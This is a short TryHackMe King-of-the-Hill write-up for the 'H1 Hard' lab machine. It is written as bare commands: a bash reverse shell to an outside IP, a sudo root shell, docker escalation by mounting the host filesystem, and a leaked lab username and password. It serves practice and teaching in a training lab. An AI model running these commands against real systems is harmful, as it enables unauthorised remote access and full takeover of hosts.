⌨️
Writeups
TryHackMeHackTheBoxDonateh00dy | Keybase
  • h00dy
  • tryhackme
    • 2024
  • KoTH
    • Carnage
    • Fireworks
    • Food
    • H1 Easy
    • Fortune
    • H1 Hard
    • Hackers
    • Hogwarts
    • Lion
    • Offline
    • Panda
    • Production
    • Shrek
    • Tyler
    • H1 Medium
  • Spacejam
Powered by GitBook
On this page
  • login on port 80 via creds of admin user
  • ssh admin@127.0.0.1 -t "bash --noprofile"
  1. KoTH

H1 Hard

TryHackMe KoTH Machine - H1 Hard

PreviousFortuneNextHackers

Last updated 7 months ago


login on port 80 via creds of admin user

/bin/bash -c 'bash -i >& /dev/tcp/10.8.91.66/8888 0>&1'

ssh admin@127.0.0.1 -t "bash --noprofile"

cd /usr/bin

export PATH="/usr/bin"

sudo -u root /bin/bash

docker run -it --name zboub -v /:/tmp/zboub ubuntu:20.04 /bin/bash

We found davelarkin user pass on port 8888 /users dir:

http://10.10.229.151:8888/users

davelarkin "totallysecurehuh"

TryHackMe | Cyber Security TrainingTryHackMe
Logo